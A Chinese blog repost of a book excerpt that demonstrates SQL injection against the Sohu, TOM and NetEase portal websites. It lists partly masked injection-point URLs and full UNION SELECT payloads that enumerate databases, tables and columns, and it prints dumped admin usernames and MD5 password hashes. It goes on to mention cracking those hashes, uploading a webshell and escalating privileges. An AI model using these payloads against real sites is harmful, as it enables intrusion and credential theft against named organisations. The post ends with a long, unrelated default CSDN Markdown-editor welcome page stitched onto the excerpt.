对搜狐 网易和TOM三大门户网站的SQL注入漏洞检测

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

               

对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测

 

本文节选自《大中型网络入侵要案直击与防御》一书

   

此外,笔者对搜狐及TOM和网易这三大门户网站作了注入攻击检测,发现同样存在明显的注入漏洞,安全性很糟糕。

 
1.MySQL注入检测搜狐门户网站
 

首先,来看看搜狐网站,搜狐网站上的动态网页大部分是采用PHP语言编写的,同样注入也很多。例如:

 

http://app.sh.sohu.com/lo***l/s.php?id=636

 

这个网页是一个欧莱雅广告页面,未对提交的数字参数进行检测,可直接利用SQL注入获得当前数据版本、库名、用户等信息。首先,通过Order by查询获得字段数目为9,然后通过union select查询可获得数据库的各种信息(图241):

 

http://app.sh.sohu.com/lo***l/s.php?id=636 and 1=2 union select 1,2,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9

 

clip_image002

 

图241 搜狐网站SQL注入查询数据库信息

 

可得到当前数据库用户名为admin,数据库服务器地址为10.10.82.159,数据库版本为Mysql 5.0.27,当前数据库名为sohush。

 

再进一步检测,发现其中存在几个非常重要的数据库,包括:dvbbs、love008。前者是论坛数据库,后者是2008专题数据库。在论坛数据库中,可猜解出管理员账号和密码为:jim、4591b******ee2b5。在love008数据库中猜解出两个管理员用户和密码分别为(图242):

 

admin 21232f297a*****743894a0e4a801fc3

 

es 3e4a632cb*****8fc2386fa5f8e4bd76

 

clip_image004

 

图242 猜解出管理员账号与密码

 

虽然说管理员密码都是MD5加密的,不过现在网上有20G的彩虹表下载,破解这些普通密码MD5值并不是太困难的事情。通过后台登陆,攻击者可以想方设法上传WebShell并进行提权与进一步渗透入侵操作。

 

此外,在搜狐网站中还有非常多的SQL注入点,举例如下:

 

注入点1(图243):http://card.money.****.com/yh/card_product.php?id=71

 

注入点2:http://blog.club.****.com/list_diary_detail.php?artid=43761&db=blog002P4&kindid=3403

 

注入点3:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

 

注入点4:http://mini***.163.com/2009/0909/wuliangye/article.php?id=13

 

注入点5:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

 

注入点6:http://people.business.****.com/person/plist.php?userid=2047

 

注入点7:http://minisite.it.****.com/minisite/site849/photodetail1.jsp?corpID=849&status=browse&privCode=04&pictureID=57275

 

注入点8:http://zj.svip.****.com/news/2010/duanxindasai/item_list.php?category_id=1905

 

clip_image006

 

图243 搜狐注入点查询数据库信息

 
2.MySQL注入检测TOM门户网站
 

TOM也是国内一大门户网站,在对TOM门户网站进行检测的过程中,也发现了许多严重的SQL注入漏洞,而且危害性非常大,直接导致攻击者登陆后台上传木马获得WebShell,并进一步控制整个网站服务器!

 

TOM网站的注入点地址为:

 

http://qd**.tom.com/blog_content.php?blogid=482

 

直接用Order by进行查询时,会出错并跳转到网站首页,可使用--终止符号进行隔断处理,执行如下查询:

 

http://qd**.tom.com/blog_content.php?blogid=482 order by 14--

 

返回正常页面,得到字段数为14。再执行如下查询(图244):

 

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9,10,11,12,13,14%20--

 

clip_image008

 

图244 union联合查询获得数据库相关信息

 

得到当前数据库版本、数据库名和用户。再爆出当前数据库中的所有表名,提交如下查询:

 

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(table_name),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

 

clip_image010

 

图245 查询到所有表名

 

在页面返回信息中,即可得到所有表名(图245)。在其中有名为adminuser的表名,表中很可能包含了管理员账号及密码,查询该表中的列名,可提交如下查询:

 

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=(0x61646D696E75736572)--

 

clip_image012

 

图246 返回用户名及密码数据列

 

从页面返回信息中,可以看到用户名及密码列为username和pw(图246)。现在要爆出用户名和密码的数据值,提交如下查询语句:

 

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(username,0x7C,pw),5,6,7,8,9,10,11,12,13,14 from adminuser--

 

clip_image014

 

图247 获得管理员账号密码信息

 

从返回的页面信息中,可看到管理员用户名为qdjxlq,密码为3631137b9b0e47608c4ece9decc9a607(图247)。密码是经过MD5加密的32密文,破解并不是很困难。得到后台管理员账号密码后,再寻找后台登陆地址,得到后台登陆链接地址为(图248):

 

http://qd**.tom.com/admin/admin_login.php

 

clip_image016

 

图248 管理员后台登陆页面

 

登陆后台获得WebShell后,就可以进一步入侵控制服务器并进行渗透攻击。

 
3.MySQL注入检测网易门户网站
 

在对国内其它门户网站进行检测时发现,有许多网站也同样存在着SQL注入漏洞,例如在网易中存在如下注入点链接地址:

 

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13

 

通过order by查询可得到字段数,再通过提交如下查询:

 

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13%20and%201=2%20union%20select%201,database(),user(),version(),5,6,7,8

 

即可得到数据库版本、用户名和数据库名信息(图249)。由于数据库为Mysql 4.0版本,因此不能直接爆出数据表名,只有靠字典一个个进行猜解,猜解起来比较麻烦。

 

clip_image018

 

图249 网易注入点猜解示例

   

  
书名:大中型网络入侵要案直击与防御

 

作者:肖遥 编著

 

ISBN 978-7-121-11740-4

 

出版日期:2010年10

 

定价:79.00

 

开本:16

 

页码:624

 

 

作者简介

 

肖遥,网名“冰河洗剑”,国内著名网络安全技术独立研究人士。

 

曾从事国防军工设计,参与过J10A、J11B等战斗机配套武器研制,独立开发出HF25火箭发射器,参与DF8GA及导弹发射架等武器设计。

 

潜心钻研网络安全技术10余年,长期担任国内多家著名网站的安全顾问,专业从事网络渗透测试与网络风险评估。

 

长年在《黑客X档案》、《黑客防线》等国内安全专业媒体上与同行分享最新研究成果。出版有《网络渗透攻击与安防修炼》、《网站入侵与脚本安全攻防修炼》、《黑客大曝光》、《黑客攻防大揭秘》等多部安全类畅销技术专著。其中,《网站入侵与脚本安全攻防修炼》一书已输出至中国台湾等地。

 

 

本书以解析各种网络环境下攻防案例的形式来讲解各种网络攻击与防护技术,从“黑客攻击”与“安全工作者防守”双向角度来进行介绍。每一章节的内容按照如下脉络展开:典型攻防案例再现→案例的简单分析→黑客攻击技术的系统讲解→网管安全防护解决方案→入侵手法与防护难点深度分析。全书真实呈现完整的攻击与防护事件,可让读者了解到攻击者如何选择攻击目标,如何制订攻击方案,如何绕过攻击中碰到的问题,网管通常采用哪些防护手法,安全漏洞在何处,网管又如何追踪攻击者,等等,因此对学习者和工作者来说都很有吸引力和参考价值。

 

本书是网络管理员、信息安全管理员、对网络安全感兴趣的人员必备的参考书,也可供大中院校或培训学校教师和学生阅读和参考。

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow

这里写图片描述
你好! 这是你第一次使用 **Markdown编辑器** 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。

新的改变

我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:

  1. 全新的界面设计 ,将会带来全新的写作体验;
  2. 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;
  3. 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示;
  4. 全新的 KaTeX数学公式 语法;
  5. 增加了支持甘特图的mermaid语法1 功能;
  6. 增加了 多屏幕编辑 Markdown文章功能;
  7. 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间;
  8. 增加了 检查列表 功能。

功能快捷键

撤销:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜体:Ctrl/Command + I
标题:Ctrl/Command + Shift + H
无序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
检查列表:Ctrl/Command + Shift + C
插入代码:Ctrl/Command + Shift + K
插入链接:Ctrl/Command + Shift + L
插入图片:Ctrl/Command + Shift + G

合理的创建标题,有助于目录的生成

直接输入1次#,并按下space后,将生成1级标题。
输入2次#,并按下space后,将生成2级标题。
以此类推,我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。

如何改变文本的样式

强调文本 强调文本

加粗文本 加粗文本

标记文本

删除文本

引用文本

H2O is是液体。

210 运算结果是 1024.

插入链接与图片

链接: link.

图片: Alt

带尺寸的图片: Alt

当然,我们为了让用户更加便捷,我们增加了图片拖拽功能。

如何插入一段漂亮的代码片

博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片.

// An highlighted block var foo = 'bar'; 

生成一个适合你的列表

  • 项目
    • 项目
      • 项目
  1. 项目1
  2. 项目2
  3. 项目3
  • 计划任务
  • 完成任务

创建一个表格

一个简单的表格是这么创建的:

项目 Value
电脑 $1600
手机 $12
导管 $1

设定内容居中、居左、居右

使用:---------:居中
使用:----------居左
使用----------:居右

第一列 第二列 第三列
第一列文本居中 第二列文本居右 第三列文本居左

SmartyPants

SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如:

TYPE ASCII HTML
Single backticks 'Isn't this fun?' ‘Isn’t this fun?’
Quotes "Isn't this fun?" “Isn’t this fun?”
Dashes -- is en-dash, --- is em-dash – is en-dash, — is em-dash

创建一个自定义列表

Markdown
Text-to- HTML conversion tool
Authors
John
Luke

如何创建一个注脚

一个具有注脚的文本。2

注释也是必不可少的

Markdown将文本转换为 HTML

KaTeX数学公式

您可以使用渲染LaTeX数学表达式 KaTeX:

Gamma公式展示 Γ ( n ) = ( n 1 ) ! n N \Gamma(n) = (n-1)!\quad\forall n\in\mathbb N 是通过欧拉积分

Γ ( z ) = 0 t z 1 e t d t   . \Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,.

你可以找到更多关于的信息 LaTeX 数学表达式here.

新的甘特图功能,丰富你的文章

gantt
        dateFormat  YYYY-MM-DD
        title Adding GANTT diagram functionality to mermaid
        section 现有任务
        已完成               :done,    des1, 2014-01-06,2014-01-08
        进行中               :active,  des2, 2014-01-09, 3d
        计划一               :         des3, after des2, 5d
        计划二               :         des4, after des3, 5d
  • 关于 甘特图 语法,参考 这儿,

UML 图表

可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图::

张三 李四 王五 你好!李四, 最近怎么样? 你最近怎么样,王五? 我很好,谢谢! 我很好,谢谢! 李四想了很长时间, 文字太长了 不适合放在一行. 打量着王五... 很好... 王五, 你怎么样? 张三 李四 王五

这将产生一个流程图。:

链接
长方形
圆角长方形
菱形
  • 关于 Mermaid 语法,参考 这儿,

FLowchart流程图

我们依旧会支持flowchart的流程图:

  • 关于 Flowchart流程图 语法,参考 这儿.

导出与导入

导出

如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ,生成一个.md文件或者.html文件进行本地保存。

导入

如果你想加载一篇你写过的.md文件或者.html文件,在上方工具栏可以选择导入功能进行对应扩展名的文件导入,
继续你的创作。


  1. mermaid语法说明 ↩︎

  2. 注脚的解释 ↩︎

猜你喜欢

转载自blog.csdn.net/akdjhf/article/details/83855123